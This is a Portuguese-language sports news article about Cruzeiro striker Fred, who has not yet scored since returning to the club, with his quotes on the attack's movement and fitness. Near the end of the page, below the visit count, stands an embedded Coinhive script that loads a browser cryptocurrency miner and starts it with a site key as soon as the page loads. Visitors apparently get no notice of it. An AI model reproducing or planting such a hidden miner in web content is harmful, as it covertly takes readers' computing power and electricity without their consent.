logo

25/1/2018 12:07

Na busca pelo gol, Fred destaca movimentação do ataque estrelado

Na busca pelo gol, Fred destaca movimentação do ataque estrelado
Fotos: Washington Alves / Light Press / Cruzeiro

Do Mineirão

Alisson Guimarães

Um dos maiores artilheiros do futebol brasileiro neste século, Fred esteve em campo nos três jogos neste seu retorno ao Cruzeiro, tem lutado muito, servido aos companheiros, mas o golzinho para marcar seu retorno está teimando em não sair.



O camisa 9 tem tentado de todas as formas desencantar e explodir de alegria a Nação Azul, mas tem esbarrado nos goleiros adversários e até mesmo na trave. Literalmente!

Em uma das primeiras jogadas mais agudas da Raposa na goleada de 4 a 0 sobre o Uberlândia, o centroavante recebeu passe açucarado de Thiago Neves e finalizou com categoria, no cantinho esquerdo de Felipe. A bola, caprichosamente, beijou a trave.

No segundo tempo, ofereceu perigo em duas cabeçadas e até em um voleio, defendido milagrosamente pelo goleiro adversário. No entanto, Fred garante que sabe que o gol sairá naturalmente.

“A bola está teimando em não entrar. Estou tentando de tudo, de pé, de cabeça. Mas, ao mesmo tempo, está bom porque estou conseguindo dar passes, ajudando a criar oportunidades. Quando os gols começarem a sair, também vou continuar com as movimentações ali na frente”, destacou o atleta, que participou diretamente da construção da jogada do terceiro gol, marcado por Rafinha, e ainda deu belíssima assistência para Henrique em uma das diversas belas jogadas do ataque cruzeirense.

Fred chamou a atenção justamente para a movimentação ofensiva da equipe, que praticou dois jogos com futebol vistoso diante da torcida no Mineirão neste início de ano.

“O mais importante é estar participando bastante nos jogos. Todo início de temporada é difícil para mim, por ser um jogador mais pesado. Mas, quando os gols começarem a sair, vão ser um atrás do outro. Meus objetivos são o de ajudar ao time e dar muitas alegrias para a nossa torcida”, projetou.

Além do gol, outra busca do atacante, assim como todo o restante do elenco, é pela forma física ideal. Com a pré-temporada ainda mais encurtada em 2018, o artilheiro acredita que o processo de evolução física da equipe virá justamente nos jogos.

“Estou muito bem, apesar dos jogos serem quarta e sábado, com menos tempo de recuperação. Quando os jogos são às quartas, temos um dia a mais de recuperação. Quando é no sábado, fica mais curto. Mas, com a estrutura e os profissionais que o Cruzeiro oferece, estou me sentindo bem”, destacou.

1371 visitas - Fonte: Site Oficial




< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.